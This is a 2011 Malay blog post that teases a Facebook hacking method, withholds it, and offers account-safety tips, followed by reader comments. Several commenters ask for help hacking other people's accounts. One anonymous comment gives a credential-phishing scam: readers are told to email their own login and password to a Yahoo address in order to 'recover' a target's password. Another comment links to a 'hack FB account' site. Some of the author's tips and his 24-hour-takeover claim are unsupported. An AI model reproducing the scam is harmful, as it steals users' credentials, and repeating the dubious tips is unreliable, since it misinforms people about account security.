Wednesday, September 28, 2011

Hack Facebook dengan mudah


Ramai yang tercari-cari kaedah bagaimana cara sebenarnya untuk hack Facebook dengan mudah. Sebelum aku menulis entri ini aku juga seperti kau, kau ,kau kat luar sana yang ingin belajar hack facebook orang. Habis segala perusuk search engine aku geledah, tapi tak de satu pun yang memang betul-betul membantu. Nak tau apa sebabnya?? kalau benda ni didedahkan, habislah ramai pengguna facebook jadi mangsa, termasuklah mereka yang mengajar cara bagaimana untuk menghack facebook.

Sejujurnya bukan aku nak mengaku aku ni hebat, tapi sistem sekuriti facebook terlalu lemah sehingga aku sendiri yang hanya membuat kajian serta beberapa percubaan "try & error" berjaya menghack facebook orang yang telah aku jadikan sasaran. (tak baik kan aku??)

Sebelum menerbitkan entri ini sebenarnaya aku ingin berkongsi kaedah tersebut, namun diatas nasihat rakan serumah aku, demi menjaga keselamatan bersama adalah tidak elok untuk aku menerbitkan entri cara bagaimana untuk hack facebook.

Pada pandangan aku sebelum aku pandai hack facebook, jika aku berjaya untuk hack facebook orang, aku akan berasa bangga. Namun, setelah aku pandai buat semua tu aku jadi takut untuk menggunakan facebook (walaupun sekarang aku masih guna facebook). Aku takut kerana disebabkan sekuriti facebook yang tersangat lemah orang lain yang pandai menghack facebook dengan mudah menggunakan facebook kita dengan menyiarkan benda-benda yang tak sepatutnya. Tak pasal-pasal tuan punya facebook yang kena.

So, aku terfikir daripada aku siarkan cara bagaimana nak hack facebook orang, baik aku bagi sedikit nasihat untuk keselamatan bersama ye. Yang aku tunjuk ni adalah berdasarkan kajian dan pemerhatian aku. Jadi aku bercakap ikut pengalaman dan kaedah aku. Lain hacker, lain kaedah.

-Tolong jangan dedahkan email yang anda gunakan untuk buat akaun facebook
-Jangan guna facebook url, contoh: http://facebook.com/rafiehassan
-Tolong tipu sikit bila membuat sikuriti question.Jangan bagi jawapan yang betul.
-Jangan accept friend request orang yang tidak dikenali.
-Jangan tag-tag gambar yang ada nama orang.
-Paling silap besar, kalau bagi password email kat orang lain. confrim adik sekolah rendah pun boleh buka.
-Jangan biarkan facebook tak buka selama 24 jam. mesti buka walau sekejap je.

Bagi aku, pasword strong mana pun kalau benda asas ni korang tak reti nak buat, selamat tinggal la kat facebook korang tuh. Tunggu masa je nak kena hack.

20 comments:

budakijaupendek said...

thanks for reminder! (:

Vanblogger said...

kunjungan mlm hari..:-)

MYVI said...

teknologi yg canggih pun boleh menyusahkan ...=(

CintaKhadijah said...

ajar ct sket.. nak g hack fb rafie hassan. haha

::ini belog saya . cinta hati saya:: said...

tima kaseh ye mengingat . :)

ctk said...

tlg ajarkan..nk hack fb someone...lau dpt, ct bg 5 inggit..hehehehe

Notebook Drivers said...

makasih infonya gan
www.articlecomputerbussines.blogspot.com

aidajusoh said...

thanx 4da tips :)

::dEyb:: said...

time kasih ye rafie :)
sesame kite mengingatkan :))))

iLa DhiLa said...

thank 4 the information

mail_killer said...

setuju sangat :)

Nur Lavender said...

tp kn rafie..kalo kite x log out facebook then kite hnye close je pon org bley hack acc kite..sbb 2 kne pastikan logout..jgn wat remind password..;p share my pendapat..^^

Saridah said...

tq segala tip di atas...

gurucyber said...

Apa kaitan dengan yang ni < -Jangan biarkan facebook tak buka selama 24 jam. mesti buka walau sekejap je. >

? boleh bagi sebab ?

RAFIE HASSAN said...

owh, ok.. pasal mesti on9 24 jam tu:
Hack ni pelbagai cara..bagi kes ini, apabila hacker berjaya meneka sekuriti question, facebook tidak terus membenarkan email & password hacker masuk terus kedalam akaun mangsa. Hacker perlu menunggu kebenaran "access" dari facebook selama 24 jam.. Jika mangsa tidak online dalam jangka masa tersebut, akaun palsu(email & password) akan disahkan sebagai empunya Akaun facebook.

sekian.

Cik Bueno said...

mcm mne nk hack nih d0e

Syahrin Rahimi said...

alamat email tu yg kena jaga..utk lgkah kselmtn,time login,pastikan "https://...".. he

Anonymous said...

teknik nie baru je aku try,memang berkesan...
Tahap 1:
buka email korang..pastu klik pada COMPOSE..
Tahap2:
nampak tak perkataan SUBJECK..?? ha kt subject tu korang tulus perkataan ni..: RETRIEVE LOST PASSWORD
Tahap 3:
ok tahap ke 3 ni korang tulis dalam kotak yg biasa kita guna untuk tulis email..
Pada perenggan pertama tulis perkataan seperti di bawah ni:
/facebook.managment/systemrecovery/cgi-bin/recovery/systemflood /v&t9858
pada perenggan ke dua korang selang sebaris tulis:
Login: (tulis email orang yg korang nak curi password dia)
Current E-mail: (tulis email facebok korang)
Password: (tulis password email facebook korang)
contoh:
——-
/facebook.managment/systemrecovery/cgi-bin/recovery/systemflood /v&t9858
Login: facebookhack@yahoo.com
Current E-mail: harimaumalaya@yahoo.com
Password: 12345678
Tahap 4:
Ok siap…senang je…
pastu..
Send email ini ke alamat email ni: recoveryp123@yahoo.com
Pastu pakat2 sabar la kejap..klo yahoo system manager tak busy dalam masa 15 minit pass_recovery_master ni akan balas email korang beserta password yg korang nak…klo busy mungkin boleh sampai 24 @ 48 jam baru depa balas email korang…
ini email baru dia

Nur Athirah said...

cam mane nk dpat kan blik facebook to ? facebook aku kne hack .. please , gi tau ..

Monssdow Mon said...

http://hackfbaccountlive.com/?ref=18892180

Post a Comment